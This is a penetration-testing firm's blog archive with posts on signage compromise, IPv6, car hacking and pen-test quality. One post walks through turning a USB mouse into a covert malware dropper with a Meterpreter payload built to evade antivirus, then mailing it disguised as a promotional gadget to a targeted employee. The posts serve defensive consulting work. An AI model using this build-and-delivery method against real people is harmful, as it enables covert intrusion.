Sunday, February 19, 2012

Tuesday, November 15, 2011

Netragard’s Badge of Honor (Thank you McAfee)

Here at Netragard We Protect You From People Like Us™ and we mean it.  We don’t just run automated scans, massage the output, and draft you a report that makes you feel good.  That's what many companies do.  Instead, we "hack" you with a methodology that is driven by hands on research, designed to create realistic and elevated levels of threat.  Don’t take our word for it though; McAfee has helped us prove it to the world.

Through their Threat Intelligence service, McAfee Labs listed Netragard as a “High Risk” due to the level of threat that we produced during a recent engagement.  Specifically, we were using a beta variant of our custom Meterbreter malware (not to be confused with Metasploit’s Meterpreter) during an Advanced Penetration Testing engagement.  The beta malware was identified and submitted to McAfee via our customers Incident Response process.  The result was that McAfee listed Netragard as a “High Risk”, which caught our attention (and our customers attention) pretty quickly.

McAfee Flags Netragard as a High Risk
Badge of Honor

McAfee was absolutely right; we are “High Risk”, or more appropriately, "High Threat", which in our opinion is critically important when delivering quality Penetration Testing services.  After all, the purpose of a Penetration Test (with regards to I.T security) is to identify the presence of points where a real threat can make its way into or through your IT Infrastructure.  Testing at less than realistic levels of threat is akin to testing a bulletproof vest with a squirt gun.

Netragard uses a methodology that’s been dubbed Real Time Dynamic Testing™ ("RTDT").  Real Time Dynamic Testing™ is a research driven methodology specifically designed to test the Physical, Electronic (networked and standalone) and Social attack surfaces at a level of threat that is slightly greater than what is likely to be faced in the real world.  Real Time Dynamic Testing™ requires that our Penetration Testers be capable of reverse engineering, writing custom exploits, building and modifying malware, etc.  In fact, the first rendition of our Meterbreter was created as a product of of this methodology.

Another important aspect of Real Time Dynamic Testing™ is the targeting of attack surfaces individually or in tandem.  The “Netragard’s Hacker Interface Device” article is an example of how Real Time Dynamic Testing™ was used to combine Social, Physical and Electronic attacks to achieve compromise against a hardened target.  Another article titled “Facebook from the hackers perspective” provides an example of socially augmented electronic attacks driven by our methodology.

It is important that we thank McAfee for two reasons.  First we thank McAfee for responding to our request to be removed from the “High Risk” list so quickly because it was preventing our customers from being able to access our servers.  Second and possibly more important, we thank McAfee for putting us on their “High Risk” list in the first place.  The mere fact that we were perceived as a “High Risk” by McAfee means that we are doing our job right.

Friday, June 24, 2011

Netragard's Hacker Interface Device (HID)

We (Netragard) recently completed an engagement for a client with a rather restricted scope. The scope included a single IP address bound to a firewall that offered no services what so ever. It also excluded the use of social attack vectors based on social networks, telephone, or email and disallowed any physical access to the campus and surrounding areas. With all of these limitations in place, we were tasked with penetrating into the network from the perspective of a remote threat, and succeeded.

The first method of attack that people might think of when faced with a challenge like this is the use of the traditional autorun malware on a USB stick. Just mail a bunch of sticks to different people within the target company and wait for someone to plug it in; when they do its game over,they’re infected. That trick worked great back in the day but not so much any more. The first issue is that most people are well aware of the USB stick threat due to the many publishedarticles about the subject. The second is that more and more companies are pushing out group policies that disable the autorun feature in Windows systems. Those two things don’t eliminate the USB stick threat, but they certainly have a significant impact on its level of success and we wanted something more reliable.

Enter PRION, the evil HID.

prion

A prion is an infectious agent composed of a protein in a misfolded form. In our case the prion isn’t composed of proteins but instead is composed of electronics which include a teensy microcontroller, a micro USB hub (small one from RadioShack), a mini USB cable (we needed the ends) a micro flash drive (made from one of our Netragard USB Streamers), some home-grown malware (certainly not designed to be destructive), and a USB device like a mouse, missile turret, dancing stripper, chameleon, or whatever else someone might be tempted to plug in. When they do plug it in, they will be infected by our custom malware and we will use that point of infection to compromise the rest of the network.

For the purposes of this engagement we choose to use a fancy USB logitech mouse as our Hacker Interface Device / Attack Platform. To turn our logitech Human Interface Device into a Hacker Interface Device, we had to make some modifications. The first step of course was to remove the screw from the bottom of the mouse and pop it open. Once we did that we disconnected the USB cable from the circuit board in the mouse and put that to the side. Then we proceed to use a drummel tool to shave away the extra plastic on the inside cover of the mouse. (There were all sorts of tabs that we could sacrifice). The removal of the plastic tabs was to make room for the new hardware.

Once the top of the mouse was gutted and all the unnecessary parts removed we began to focus on the USB hub. The first thing we had to do was to extract the board from the hub. Doing that is a lot harder than it sounds because the hub that we chose was glued together and we didn’t want to risk breaking the internals by being too rough. After about 15 minutes of prying with a small screwdriver (and repeated accidental hand stabbing) we were able to pull the board out from the plastic housing. We then proceeded to strip the female USB connectors off of the board by heating their respective pins to melt the solder (careful not to burn the board). Once those were extracted we were left with a naked USB hub circuit board that measured about half an inch long and was no wider than a small bic lighter.

With the mouse and the USB board prepared we began the process of soldering. The first thing that we did was to take the mini USB cable, cut one of the ends off leaving about 1 inch of wire near the connector. Then we stripped all plastic off of the connector and stripped a small amount of wire from the 4 internal wires. We soldered those four wires to the USB board making sure to follow theright pinout pattern. This is the cable that will plug into the teensy mini USB port when we insert the teensy microcontroller.

Once that was finished we took the USB cable that came with the mouse and cut the circuit board connector off of the end leaving 2 inchs of wire attached. We stripped the tips of the 4 wires still attached to the connector and soldered those to the USB hub making sure to follow the right pinout patterns mentioned above. This is an important cable as its the one that connects the USB hub to the mouse. If this cable is not soldered properly and the connections fail, then the mouse will not work. We then took the other piece of the mouse cable (the longer part) and soldered that to the USB board. This is the cable that will connect the mouse to the USB port on the computer.

At this point we have three cables soldered to the USB hub. Just to recap those cables are the mouse connector cable, the cable that goes from the mouse to the computer, and the mini USB adapter cable for the teensy device. The next and most challenging part of this is to solder the USB flash drive to the USB hub. This is important because the USB flash drive is where we store our malware. If the drive isn’t soldered on properly then we won’t be able to store our malware on the drive and the the attack would be mostly moot. ( We say mostly because we could still instruct the mouse to fetch the malware from a website, but that’s not covert.)

To solder the flash drive to the USB hub we cut about 2 inches of cable from the mini USB connector that we stole the end from previously. We stripped the ends of the wires in the cable and carefully soldered the ends to the correct points on the flash drive. Once that was done we soldered the other ends of the cable to the USB hub. At that point we had everything soldered together and had to fit it all back into the mouse. Assembly was pretty easy because we were careful to use as little material as possible while still giving us the flexibility that we needed. We wrapped the boards and wires in single layers of electrical tape as to avoid any shorts. Once everything was we plugged in we tested the devices. The USB drive mounted, the teensy card was programmable, and the mouse worked.

Time to give prion the ability to infect…

We learned that the client was using Mcafee as their antivirus solution because one of their employees was complaining about it on Facebook. Remember, we weren’t allowed to use social networks for social engineering but we certainly were allowed to do reconnaissance against social networks. With Mcafee in our sights we set out to create custom malware for the client (as we do for any client and their respective antivirus solution when needed). We wanted our malware to be able to connect back to Metasploit because we love the functionality, we also wanted the capabilities provided by meterpreter, but we needed more than that. We needed our malware to be fully undetectable and to subvert the “Do you want to allow this connection” dialogue box entirely. You can’t do that with encoding…

To make this happen we created a meterpreter C array with the windows/meterpreter/reverse_tcp_dns payload. We then took that C array, chopped it up and injected it into our own wrapper of sorts. The wrapper used an undocumented (0-day) technique to completely subvert the dialogue box and to evade detection by Mcafee. When we ran our tests on a machine running Mcafee, the malware ran without a hitch. We should point out that our ability to evade Mcafee isn’t any indication of quality and that we can evade any Antivirus solution using similar custom attack methodologies. After all, its impossible to detect something if you don’t know what it is that you are looking for (It also helps to have a team of researchers at our disposal).

Once we had our malware built we loaded it onto the flash drive that we soldered into our mouse. Then we wrote some code for the teensy microcontroller to launch the malware 60 seconds after the start of user activity. Much of the code was taken from Adrian Crenshaw’s website who deserves credit for giving us this idea in the first place. After a little bit of debugging, our evil mouse named prion was working flawlessly.

Usage: Plug mouse into computer, get pwned.

The last and final step here was to ship the mouse to our customer. One of the most important aspects of this was to repack the mouse in its original package so that it appeared unopened. Then we used Jigsaw to purchase a list of our client’s employes. We did a bit of reconnaissance on each employee and found a target that looked ideal. We packaged the mouse and made it look like a promotional gadget, added fake marketing flyers, etc. then shipped the mouse. Sure enough, three days later the mouse called home.

pwned

Friday, February 25, 2011

Netragard Signage Snatching

Recently Netragard has had a few discussions with owners and operators of sports arenas, with the purpose of identifying methods in which a malicious hacker could potentially disrupt a sporting event, concert, or other large scale and highly visible event.

During the course of the these conversations, the topic of discussion shifted from network exploitation to social engineering, with a focus on compromise of the digital signage systems.  Until recently, even I hadn’t thought about how extensively network controlled signage systems are used in facilities like casinos, sports arenas, airports, and roadside billboards.  That is, until our most recent casino project.

Netragard recently completed a Network Penetration Test and Social Engineering Test for a large west coast casino, with spectacular results. Not only were our engineers able to gain the keys to the kingdom, they were also able to gain access to the systems that had supervisory control for every single digital sign in the facility.  Some people may think to themselves, “ok, what’s the big deal with that?”.  The answer is simple:  Customer perception and corporate image.

Before I continue on, let me provide some background; Early in 2008, there were two incidents in California where two on-highway digital billboards were compromised, and their displays changed from the intended display.  While both of these incidents were small pranks in comparison to what they could have done, the effect was remembered by those who drove by and saw the signs.  (Example AExample B)

Another recent billboard hack in Moscow, Russia, wasn’t as polite as the pranksters in California.  A hacker was able to gain control of a billboard in downtown Moscow (worth noting, Moscow is the 7th largest city in the world), and after subsequently gaining access, looped a video clip of pornographic material. (Example C) Imagine if this was a sports organization, and this happened during a major game.

Brining this post back on track, let’s refocus on the casino and the potential impact of signage compromise.  After spending time in the signage control server, we determined that there were over 40 unique displays available to control, some of which were over 100″ in display size.  WIth customer permission, we placed a unique image on a small sign for proof of concept purposes (go google “stallowned”).  This test, coupled with an impact audit, clearly highlighted to the casino that ensuring the security of their signage systems was nearly as paramount to securing their security systems, cage systems, and domain controllers.   All the domain security in the world means little to a customer if they’re presented with disruptive material on the signage during their visit to the casino.  A compromise of this nature could cause significant loss or revenue, and cause a customer to never re-visit the casino.

I also thought it pertinent for the purpose of this post to share another customer engagement story.  This story highlights how physical security can be compromised by a combination of social engineering and network exploitation, thus opening an additional risk vector that could allow for compromise of the local network running the digital display systems.

Netragard was engaged by a large bio-sciences company in late 2010 to assess the network and physical security of multiple locations belonging to a business unit that was a new acquisition.   During the course of this engagement, Netragard was able to take complete control of their network infrastructure remotely, as is the case in most of our engagements.  More so, our engineers were able to utilize the social engineering skills and “convince” the physical site staff to grant them building access.  Once passing this first layer of physical access, by combining social and network exploitation, they were subsequently able to gain access to sensitive labs and document storage rooms.  These facilities/rooms were key to the organizations intellectual property, and on-going research.  Had our engineers been hired by a competing company or other entity, there would have been a 100% chance that the IP (research data, trials data, and so forth) could have been spirited off company property and into hands unknown.

By combining network exploitation and social engineering, we’ve postulated to the sports arena operators that Netragard has a high probability of gaining access to the control systems for their digital signage.  Inevitably, during these discussions the organizations push back stating that their facilities have trained security staff and access control systems.  To that we inform them that the majority of sports facilities staff are more attuned to illicit access attempts in controlled areas, but only during certain periods of operation, such as active games, concerts, and other large scale events.   During non-public usage hours though, there’s a high probability that a skilled individual could gain entry to access controlled areas during a private event, or through beach of trust, such as posing as a repair technician, emergency services employee, or even a facility employee.

One area of concern for any organization, whether they be a football organization, Fortune 100 company, or a mid-size business, is breach of trust with their consumer base.  For a major sports organization, the level of national exposure and endearment far exceeds the exposure most Netragard customers have to the public.  Because of this extremely high national exposure, a sports organization and its arena are a prime target for those who may consider highly visible public disruption of games a key tool in furthering an socio-political agenda.  We’re hopeful that these organizations will continue to take a more serious stance to ensure that their systems and public image are as protected as possible.

Tuesday, February 22, 2011

Quality Penetration Testing by Netragard

The purpose of Penetration Testing is to identify the presence of points where an external entity can make its way into or through a protected entity. Penetration Testing is not unique to IT security and is used across a wide variety of different industries. For example, Penetration Tests are used to assess the effectiveness of body armor. This is done by exposing the armor to different munitions that represent the real threat. If a projectile penetrates the armor then the armor is revised and improved upon until it can endure the threat.

Network Penetration Testing is a class of Penetration Testing that applies to Information Technology. The purpose of Network Penetration Testing is to identify the presence of points where a threat (defined by the hacker) can align with existing risks to achieve penetration. The accurate identification of these points allows for remediation.

Successful penetration by a malicious hacker can result in the compromise of data with respect to Confidentiality, Integrity and Availability (“CIA”). In order to ensure that a Network Penetration Test provides an accurate measure of risk (risk = probability x impact) the test must be delivered at a threat level that is slightly elevated from that which is likely to be faced in the real world. Testing at a lower than realistic threat level would be akin to testing a bulletproof vest with a squirt gun.

Threat levels can be adjusted by adding or removing attack classes. These attack classes are organized under three top-level categories, which are Network Attacks, Social Attacks, and Physical Attacks. Each of the top-level categories can operate in a standalone configuration or can be used to augment the other. For example, Network Penetration Testing with Social Engineering creates a significantly higher level of threat than just Network Penetration Testing or Social Engineering alone. Each of the top-level threat categories contains numerous individual attacks.

A well-designed Network Penetration Testing engagement should employ the same attack classes as a real threat. This ensures that testing is realistic which helps to ensure effectiveness. All networked entities face threats that include Network and Social attack classes. Despite this fact, most Network Penetration Tests entirely overlook the Social attack class and thus test at radically reduced threat levels. Testing at reduced threat levels defeats the purpose of testing by failing to identify the same level of risks that would likely be identified by the real threat. The level of threat that is produced by a Network Penetration Testing team is one of the primary measures of service quality.

Tuesday, January 25, 2011

Netragard Challenges your PCI Compliance

The purpose of legitimate Network Penetration Testing is to positively identify risks in a targeted IT Infrastructure before those risks are identified and exploited by malicious hackers. This enables the IT managers to remediate against those risks before they become an issue. To accomplish this the Penetration Test must be driven by people with at least the same degree of skill and persistence as the threat (defined by the malicious hacker). If the Penetration Test is delivered with a skill set that is less than that of the real threat then the test will likely be ineffective. This would be akin to testing the effectiveness a bullet-proof vest with a squirt gun.

Unfortunately most penetration tests don’t test at realistic threat levels. This is especially true with regards to PCI based penetration tests. Most PCI based penetration testing companies do the bare minimum required to satisfy PCI requirement 11.3. This is problematic because it results in businesses passing their PCI penetration tests when they should have failed and it promotes a false sense of security. The truth is that most businesses that pass their annual PCI audits are still relatively easy to hack. If you don’t believe us then let us prove it and hire us (Netragard) to deliver a conditional penetration test. If we can’t penetrate your network using our unrestricted, advanced methodology then the next test is free. (Challenge ends March, 31st 2011).

Sunday, January 16, 2011

Netragard: Connect to Chaos

The Chevy Volt will be the first car of its type: not because it is a hybrid electric/petrol vehicle, but because GM plans to give each one the company sells its own IP address. The Volt will have no less than 100 microcontrollers running its systems from some 10 million lines of code. This makes some hackers very excited and Adriel Desautels, president of security analysis firmNetragard, very worried. Before now, you needed physical access to reprogram the software inside a car: an ‘air gap’ protected vehicles from remote tampering. The Volt will have no such physical defence. Without some kind of electronic protection, Desautels sees cars such as the Volt and its likely competitors becoming ‘hugely vulnerable 5000lb pieces of metal’.

Desautels adds: “We are taking systems that were not meant to be exposed to the threats that my team produces and plug it into the internet. Some 14 year old kid will be able to attack your car while you’re driving.

The full article can be found here.

Friday, January 14, 2011

Pentesting IPv6 vs IPv4

We’ve heard a bit of “noise” about how IPv6 may impact network penetration testing and how networks may or may not be more secure because of IPv6.  Lets be clear, anyone telling you that IPv6 makes penetration testing harder doesn’t understand the first thing about real penetration testing.

Whats the point of IPv6?

IPv6 was designed by the Internet Engineering Task Force (“IETF”) to address the issue of IPv4 address space exhaustion.  IPv6 uses a 128-bit address space while IPv4 is only 32 bits.  This means that there are 2128 possible addresses with IPv6, which is far more than the 232addresses available with IPv4.  This means that there are going to be many more potential targets for a penetration tester to focus on when IPv6 becomes the norm.

What about increased security with IPv6?

The IPv6 specification mandates support for the Internet Protocol Security (“IPSec”) protocol suite, which is designed to secure IP communications by authenticating and encrypting each IP Packet. IPSec operates at the Internet Layer of the Internet Protocol suite and so differs from other security systems like the Secure Socket Layer, which operates at the application layer. This is the only significant security enhancement that IPv6 brings to the table and even this has little to no impact on penetration testing.

What some penetration testers are saying about IPv6.

Some penetration testers argue that IPv6 will make the job of a penetration testing more difficult because of the massive increase in potential targets. They claim that the massive increase in potential targets will make the process of discovering live targets impossibly time consuming. They argue that scanning each port/host in an entire IPv6 range could take as long as 13,800,523,054,961,500,000 years.  But why the hell would anyone waste their time testing potential targets when they could be testing actual live targets?

The very first step in any penetration test is effective and efficient reconnaissance. Reconnaissance is the military term for the passive gathering of intelligence about an enemy prior to attacking an enemy.  There are countless ways to perform reconnaissance, all of which must be adapted to the particular engagement.  Failure to adapt will result bad intelligence as no two targets are exactly identical.

A small component of reconnaissance is target identification.  Target identification may or may not be done with scanning depending on the nature of the penetration test.  Specifically, it is impossible to deliver a true stealth / covert penetration test with automated scanners.  Likewise it is very difficult to use a scanner to accuratley identify targets in a network that is protected by reactive security systems (like a well configured IPS that supports black-listing).  So in some/many cases doing discovery by scanning an entire block of addresses is ineffective.

A few common methods for target identification include Social Engineering, DNS enumeration, or maybe something as simple as asking the client to provide you with a list of targets.  Not so common methods involve more aggressive social reconnaissance, continued reconnaissance after initial penetration, etc.  Either way, it will not take 13,800,523,054,961,500,000 years to identify all of the live and accessible targets in an IPv6 network if you know what you are doing.

Additionally, penetration testing against 12 targets in an IPv6 network will take the same amount of time as testing 12 targets in an IPv4 network.  The number of real targets is what is important and not the number of potential targets.  It would be a ridiculous waste of time to test 2128 IPv6 Addresses when only 12 IP addresses are live.  Not to mention that increase in time would likely translate to an increase in project cost.

So in reality, for those who are interested, hacking an IPv6 network won’t be any more or less difficult than hacking an IPv4 network.  Anyone that argues otherwise either doesn’t know what they are doing or they are looking to charge you more money for roughly the same amount of work.

Friday, January 7, 2011

Hacking your car for fun and profit.

Our CEO (Adriel Desautels) recently spoke at the Green Hills Software Elite Users Technology Summit regarding automotive hacking.  During his presentation there were a series of reporters taking photographs, recording audio, etc.  Of all of the articles that came out, one in particular caught our eye.  We made the front page of “Elektronik iNorden” which is a Swiss technology magazine that focuses on hardware and embedded systems.  You can see the full article here but you’ll probably want to translate:

http://www.webbkampanj.com/ein/1011/?page=1&mode=50&noConflict=1

What really surprised us during the presentation was how many people were in disbelief about the level of risk associated with cars built after 2007.  For example, it really isn’t all that hard to program a car to kill the driver.  In fact, its far too easy due to the overall lack of security cars today.

Think of a car as an IT Infrastructure.  All of the servers in the infrastructure are critical systems that control things like breaks, seat belts, door locks, engine timing, airbags, lights, the radio, the dashboard display, etc.  Instead of these systems being plugged into a switched network they are plugged into a hub network lacking any segmentation with no security to speak of.  The only real difference between the car network and your business network is that the car doesn’t have  an internet connection.

Enter the Chevrolet Volt, the first car to have its own IP address. Granted we don’t yet know how the Volt’s IP address will be protected.  We don’t know if each car will have a public IP address or if the cars will be connected to a private network controlled by Chevy (or someone else).  What we do know is that the car will be able to reach out to the internet and so it will be vulnerable to client side attacks.

So what happens if someone is able to attack the car?

Realistically if someone is able to hack into the car then they will be able to take full control over almost any component of the car.  They can do anything from apply the breaks, accelerate the car, prevent the brakes from applying, kill (literally destroy) the engine, apply the breaks to one side of the car, lock the doors, pretension the seat belts, etc.  For those of you that think this is Science Fiction, it isn’t.  Here’s one of many research papers that demonstrates the risks.

Why is this possible?

This is possible because people adopt technology too quickly and don’t stop to think about the risks but instead are blinded by the continence that it introduces.  We see this in all industries not just automotive. IT managers, CIO’s, CSO’s, CEO’s, etc. are always purchasing and deploying new technologies without really evaluating the risks.  In fact just recently we had a client purchase a “secure email gateway” technology… it wasn’t too secure.  We were able to hack it and access every email on the system because it relied on outdated third party software.

Certainly another component that adds to this is that most software developers write vulnerable and buggy code (sorry guys but its true).  Their code isn’t written to be secure, its written to do a specific thing like handle network traffic, beep your horn, send emails, whatever.  Poor code + a lack of security awareness == high risks.

So what can you do ?

Before you decide to adopt new technology make sure that you understand the benefits and the risks associated with the adoption.  If you’re not technical enough (most people aren’t) to do a low-level security evaluation then hire someone (a security researcher) to do it for you.  If you don’t then you could very well be putting yourselves and your customers at serious risk.

Thursday, December 2, 2010

Untitled

I recently participated in a panel at the BASC conference that was held at the Microsoft New England Research & Development (NERD) building at One Memorial Drive in Cambridge. One of the questions that surfaced inspired me to write this article.

While there are more security solutions available today than ever before, are we actually becoming more secure or is the gap growing? The short answer is yes. The security industry is reactive in that it can only respond to threats but it cannot predict them. This is because of threats are defined by malicious hackers and technology savvy criminals and not the security industry. Antivirus technology for example, was created as a response to viruses that were being written by hackers. So yes, security is getting better, technologies are advancing, and the gap is still growing rapidly. One major part of the problem is that people adopt new technologies too quickly. They don’t stop to question those technologies from the perspective a hacker…

A prime example of this problem is clearly demonstrated within the automotive industry. Computer systems that are in automobiles were not designed to withstand any sort of real hacker threat. This wasn’t much of a problem at first because automotive computer systems weren’t Internet connected and at first they didn’t have direct control over things like breaks and the accelerator. That all changed as the automotive industry advanced and as people wanted the convenience that computer technology could bring to the table. Now automotive computer systems directly control critical automotive functions and a hacker can interface with the computer system and cause potentially catastrophic failures. Despite this the problem wasn’t perceived as particularly high risk because accessing the computer system required physical access to the car (or close proximity for TPMS like hacks). That is all going to change when the Chevy Volt hits the streets since the Chevy Volt actually has its own IP address and is network connected. Is the risk really worth the convenience?

Another good example of how we adopt technology too quickly is demonstrated in critical infrastructure (power, water, communications, etc). Just like the automotive industry critical systems were not initially designed to be plugged into the Internet. These critical systems are the systems that control the water coolant levels in our nuclear power plants or the mixtures of chemicals in water treatment plants, etc. Some of these critical systems were designed in the 1960’s so the concept of the “hacker threat” didn’t exist. Other systems are very modern but even those aren’t designed to be secure as much as they are designed to be functional. Back in the day power plants, water treatment plants, etc. were air-gaped to isolate them from potentially harmful environments. But as the Internet offered more and more convenience the air-gaps that once existed are almost extinct. Now our critical systems connected to the Internet and exposed to real hacker threats; and do they get hacked? Yes. Again, is the risk really worth the convenience?

Of course an example that everyone can relate to is business networks. Business networks are constantly evolving and new technologies are continually being adopted without proper vetting. These technologies often include web applications, security technologies, backup technologies, content management systems, etc. These technologies usually promise to make things easier and thus save time which equates to saving money. For example, the other week we were delivering a penetration test for a pharmaceutical company. This company had a video conference system setup so that they could speak with remote offices and have “face to face” conversations. They loved the technology because it made for more productive meetings and we loved the technology because it was easy to hack.

Despite the fact that the security industry is evolving at a rapid pace, it can’t keep up with the volume of people that are prematurley adopting new and untested technologies. This adoption causes the gap between good security and security risks to grow. To help close the gap consumers need to start challenging their vendors. They need to ask their vendors to demonstrate the security of their technology and maybe even to make some sort of a guarantee about it. There are some solid companies out there that offer services designed to enhance the security of technology products. Once such company is Veracode (no affiliation with Netragard).